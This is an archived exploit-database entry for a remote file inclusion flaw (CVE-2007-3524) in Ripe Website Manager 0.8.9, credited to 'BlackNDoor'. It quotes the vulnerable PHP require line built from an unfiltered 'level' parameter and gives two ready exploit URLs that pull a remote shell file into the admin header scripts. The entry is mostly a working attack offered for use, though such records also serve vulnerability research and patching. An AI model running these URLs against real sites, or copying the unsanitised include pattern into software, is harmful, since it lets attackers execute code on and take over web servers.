Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion

Author: BlackNDoor
type: webapps
platform: php
port: 
date_added: 2007-06-29 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-37800;CVE-2007-3524;OSVDB-37799 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comRipe_v0.8.9.zip

#Author::   BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script::   Ripe Wepsite Manager
#Version::  <= v0.8.9
#Type::     Remote File Include
#
#Source::   http://sourceforge.net/project/showfiles.php?group_id=194532

#Bug::
   -> Files:

      /admin/includes/author_panel_header.php
      /admin/includes/admin_header.php

   -> vulncode:

      <?php
         ...
         define("LEVEL", $level); // directory level

         // includes
           require(LEVEL.'../includes/config.php');
         ...
      ?>

#Exploit::

   http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
   http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?

#thanks:: str0ke

# milw0rm.com [2007-06-30]